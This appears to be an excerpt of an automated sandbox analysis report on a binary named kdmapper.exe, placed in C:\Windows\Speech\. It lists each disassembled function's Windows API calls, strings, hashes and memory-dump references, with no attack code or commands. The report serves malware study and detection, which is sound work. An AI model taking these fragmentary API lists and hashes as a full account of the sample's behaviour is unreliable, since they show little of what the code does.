Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 4960c0a7e78b2c70fb7431e9bd00ba6f67d57fdb9fbbe2479316525bc2db0798
Instruction ID: 0f4ca17c0abbaea3d1210f8481a4234b2894c59b6f658ba31bf4d38b585c606c
Opcode Fuzzy Hash: 4960c0a7e78b2c70fb7431e9bd00ba6f67d57fdb9fbbe2479316525bc2db0798
Instruction Fuzzy Hash: F8F06D33008118BFCF225F61EC09DDA3F6AEB44760B11C005F61A6A0A2CB72D6A2D690

Function 00DFB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
IsDialogMessageW.USER32(00010420,?), ref: 00DFB59E
TranslateMessage.USER32(?), ref: 00DFB5AC
DispatchMessageW.USER32(?), ref: 00DFB5B6

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: d285e7f67771a3c5b50f3426f04c0ce4ce9e617b899385ae33398361285f7e4f
Instruction ID: d085dce0393f91ec1a5a6c587589ff3e008c8bd2ca6d30fc2d3a1cd07349024f
Opcode Fuzzy Hash: d285e7f67771a3c5b50f3426f04c0ce4ce9e617b899385ae33398361285f7e4f
Instruction Fuzzy Hash: 15F0D675A01119AF8B209BF6DC4CDEB7FBCDF063517044515B519E2150EB38D60ACBB0

Function 00DF15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DF17BC
_swprintf.LIBCMT ref: 00DF186B

Strings

%s: %s, xrefs: 00DF17CB
%ls, xrefs: 00DF1641, 00DF1657

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 05e36623284fe5b6af8aae7e671f339a8941b9a264267147e89fbf90f6959ed8
Instruction ID: 4770c847b18165b38398c61d0254b00f23f515fec4582b073e745fb9908f91cb
Opcode Fuzzy Hash: 05e36623284fe5b6af8aae7e671f339a8941b9a264267147e89fbf90f6959ed8
Instruction Fuzzy Hash: A951DB3D24830CF6E62136948E46F357665EB05B44F26C506F3DEF84D1C9A2E450BB3A

Function 00E07F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Speech\kdmapper.exe,00000104), ref: 00E07FAE
_free.LIBCMT ref: 00E08079
_free.LIBCMT ref: 00E08083

Strings

C:\Windows\Speech\kdmapper.exe, xrefs: 00E07FA5, 00E07FAC, 00E07FDB, 00E08013

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Speech\kdmapper.exe
API String ID: 2506810119-2414484506
Opcode ID: 6ac8aa94ae1f68daa77bac3b72bc85c9497e8a4bc623d3484ad9557054fca400
Instruction ID: 9ab0ae0e3e84011d92cad803d5f6c8b3235a9ea42f370f6e8bdf3aaf907a41fa
Opcode Fuzzy Hash: 6ac8aa94ae1f68daa77bac3b72bc85c9497e8a4bc623d3484ad9557054fca400
Instruction Fuzzy Hash: 4F31E270A00209AFDB21DF95DD8099EBBFCEF85300F1050AAF544B7291DB709E85CB60

Function 00E031D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E031FB
_abort.LIBCMT ref: 00E03306

Strings

RCC, xrefs: 00E03215
MOC, xrefs: 00E0320D

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: ff46e065b4db9065a0124c80e302aca17463e986f3d83de8e2d1e2e6caebe209
Instruction ID: ac2930d5eedceb0ea138c9b39d7941aead85ec9e06318b7cd22952a61f047ff2
Opcode Fuzzy Hash: ff46e065b4db9065a0124c80e302aca17463e986f3d83de8e2d1e2e6caebe209
Instruction Fuzzy Hash: 3D415871900209AFCF15DFA4CD81AEEBBB9FF48308F189059FA04762A5D735AA90DB50

Function 00DE7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE7406

Part of subcall function 00DE3BBA: __EH_prolog.LIBCMT ref: 00DE3BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00DE74CD

Part of subcall function 00DE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00DE7AAB
Part of subcall function 00DE7A9C: GetLastError.KERNEL32 ref: 00DE7AF1
Part of subcall function 00DE7A9C: CloseHandle.KERNEL32(?), ref: 00DE7B00

Strings

SeRestorePrivilege, xrefs: 00DE7460
SeSecurityPrivilege, xrefs: 00DE744B

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: cb778a6f63892b06ff9a159eba9d4d06fc6d952eecfc3fdadcfaad1274adc38d
Instruction ID: 9518dbae9049f63f3e8f0cc34c80a319e619924ae06486b17720cf2fa8e13550
Opcode Fuzzy Hash: cb778a6f63892b06ff9a159eba9d4d06fc6d952eecfc3fdadcfaad1274adc38d
Instruction Fuzzy Hash: 4931C371D04298AEDF51FBA6DC45FEE7BB9EB19304F084055F405B7182C7748A848771

Function 00DFAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370

EndDialog.USER32(?,00000001), ref: 00DFAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00DFADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00DFADC2

Strings

ASKNEXTVOL, xrefs: 00DFAD28

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 7789bb65d5c36d96c6507c98eee7926224b7492fa2de8488acb4d3dded5e27a4
Instruction ID: 47bdea1366414127cf9b9a65f973ef4a8c0e22958a6cf5e736712859c8bb2d91
Opcode Fuzzy Hash: 7789bb65d5c36d96c6507c98eee7926224b7492fa2de8488acb4d3dded5e27a4
Instruction Fuzzy Hash: E7110372280204AFD7119FADEC44FBA7769EF4B742F164000F348EB4A0D761A94A8732

Function 00DED8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00DED954
_strncpy.LIBCMT ref: 00DED99A

Part of subcall function 00DF1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E21030,00000200,00DED928,00000000,?,00000050,00E21030), ref: 00DF1DC4

Strings

@%s, xrefs: 00DED93E
$%s, xrefs: 00DED949

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: be8aea5d83b5e88f74d1b00177372a3e6e109128b92ff98ba8964bbddc176cfb
Instruction ID: ab96d70b8c7809f3e6cbbfdcd898f774011741d43ffd06aaa4bc938d320a4fa0
Opcode Fuzzy Hash: be8aea5d83b5e88f74d1b00177372a3e6e109128b92ff98ba8964bbddc176cfb
Instruction Fuzzy Hash: B7218E32440288AADB20EEB5CC41FEE7BA9AF05304F044012F954A61A3EA71D6588F71

Function 00DF0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00DEAC5A,00000008,?,00000000,?,00DED22D,?,00000000), ref: 00DF0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00DEAC5A,00000008,?,00000000,?,00DED22D,?,00000000), ref: 00DF0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00DEAC5A,00000008,?,00000000,?,00DED22D,?,00000000), ref: 00DF0E9F

Strings

Thread pool initialization failed., xrefs: 00DF0EB7

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: ac654f99da3a6b76f23d5d430631f29d1941d7abecdf0260014d820fda8d467a
Instruction ID: 8db96a7fa53fb1246b54769acf3d2d455acd70f2422fbb5cd43436382be16379
Opcode Fuzzy Hash: ac654f99da3a6b76f23d5d430631f29d1941d7abecdf0260014d820fda8d467a
Instruction Fuzzy Hash: 16115EB164070C9FC3215F7A9C849A7FFECEB69744F25882EF2DAC3201D6B199408B64

Function 00DFDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00DFDD31
REPLACEFILEDLG, xrefs: 00DFDD1C, 00DFDD50

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: d273c6aa092e71cb5f963ea8ba5ed8300fd072e98cb7f5703d6b812f8cf115b3
Instruction ID: 0e14b9fdc36e6b32fc8f34cddd9af2046d2453c3ff308f2447c2bdd4f2a8a953
Opcode Fuzzy Hash: d273c6aa092e71cb5f963ea8ba5ed8300fd072e98cb7f5703d6b812f8cf115b3
Instruction Fuzzy Hash: DC01B57660434DAFD7206F66FD44ABA7FA7F759344B058026FA05E3270C6309859DBB0

Function 00E09A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00E09AA9
__alldvrm.LIBCMT ref: 00E09CAA
__alldvrm.LIBCMT ref: 00E09CCC

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: 80ee623d8f7edfb489a0f33a04e0c068e37121422fc15106a24fe1852b4bb9e1
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: C9A13672E042869FEB25CF28C8917AEFBE5EF55314F18516DE585AB2C3C23889C1C754

Function 00DEA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00DE7F69,?,?,?), ref: 00DEA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00DE7F69,?), ref: 00DEA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00DE7F69,?,?,?,?,?,?,?), ref: 00DEA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00DE7F69,?,?,?,?,?,?,?,?,?,?), ref: 00DEA4C6

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 81b89300b535a9b49164f77a21f25447883e597c3f8d7ec2ff2ac5888245e064
Instruction ID: 79e7906f1a87305083026aae8593fc95fea8662046e8ca183d5c83bd665fe0b9
Opcode Fuzzy Hash: 81b89300b535a9b49164f77a21f25447883e597c3f8d7ec2ff2ac5888245e064
Instruction Fuzzy Hash: 8A41CE312483C29AD731EF69DC45BAEBBE4AB84300F088919B5D4971C1D6A4AA489B73

Function 00DE1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DE112B
_wcslen.LIBCMT ref: 00DE1153
_wcslen.LIBCMT ref: 00DE1182
_wcslen.LIBCMT ref: 00DE11A9

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 603c509ec329b0bdebc540eb41805c3dbf1dc8787e3243a72a172211a84f64e8
Instruction ID: 69b06f2b4088f5d3488a4753ef5ff68ef9fc6304c5b2dfbf916930595a2c5f3a
Opcode Fuzzy Hash: 603c509ec329b0bdebc540eb41805c3dbf1dc8787e3243a72a172211a84f64e8
Instruction Fuzzy Hash: 3841B675A006695FCB21AF79CC069EE7BBCEF01310F044119FA45F7242DB30AE598AB5

Function 00E0C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00E091E0,?,00000000,?,00000001,?,?,00000001,00E091E0,?), ref: 00E0C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E0CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00E06CBE,?), ref: 00E0CA70
__freea.LIBCMT ref: 00E0CA79

Part of subcall function 00E08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E0CA2C,00000000,?,00E06CBE,?,00000008,?,00E091E0,?,?,?), ref: 00E08E38

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: ace95bf84e67b0f935b43b06850d6190019107e46303edb08e6b4c617b92273d
Instruction ID: a12d8bbd94782e5063a1e4db5becfcd5e0f66fb63b4e99b11738f0643765fff3
Opcode Fuzzy Hash: ace95bf84e67b0f935b43b06850d6190019107e46303edb08e6b4c617b92273d
Instruction Fuzzy Hash: A7319972A0020AABDB24DF75DC45DEE7BA5EB41314B284228FC05A6290EB35CD94CBA0

Function 00DFA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00DFA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00DFA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DFA683
ReleaseDC.USER32(00000000,00000000), ref: 00DFA691

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 53d86e12561fdf3f8f6f737c59f885ff07e49f6d14d3c5a949230826b24d857b
Instruction ID: 3322c7dec92ee66d1782f136e8b61a7b3dd6279e3c50edf774adf76bd4c99721
Opcode Fuzzy Hash: 53d86e12561fdf3f8f6f737c59f885ff07e49f6d14d3c5a949230826b24d857b
Instruction Fuzzy Hash: C5E0E635942721AFD3615B766D0DB8B3E54AB16B52F054301F605B5190DB64450A8BA1

Function 00DFA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00DFA699: GetDC.USER32(00000000), ref: 00DFA69D
Part of subcall function 00DFA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DFA6A8
Part of subcall function 00DFA699: ReleaseDC.USER32(00000000,00000000), ref: 00DFA6B3

GetObjectW.GDI32(?,00000018,?), ref: 00DFA83C

Part of subcall function 00DFAAC9: GetDC.USER32(00000000), ref: 00DFAAD2
Part of subcall function 00DFAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00DFAB01
Part of subcall function 00DFAAC9: ReleaseDC.USER32(00000000,?), ref: 00DFAB99

Strings

(, xrefs: 00DFA9AA

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 5ec5392b172e4392d693a300ff08c9be797ef07210a6f3b1ba5e0063af0c05bb
Instruction ID: b5e95c13de4512a03588edba774d4c7d17deeb7475af75d0f1503e1075f8159d
Opcode Fuzzy Hash: 5ec5392b172e4392d693a300ff08c9be797ef07210a6f3b1ba5e0063af0c05bb
Instruction Fuzzy Hash: 6191F3B5604354AFD710DF29C84496BBBE8FFC9700F01891EF59AD3260DB70A94ACB62

Function 00E0B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E0B324

Part of subcall function 00E09097: IsProcessorFeaturePresent.KERNEL32(00000017,00E09086,00000050,00E13A34,?,00DED710,00000004,00E21030,?,?,00E09093,00000000,00000000,00000000,00000000,00000000), ref: 00E09099
Part of subcall function 00E09097: GetCurrentProcess.KERNEL32(C0000417,00E13A34,00000050,00E21030), ref: 00E090BB
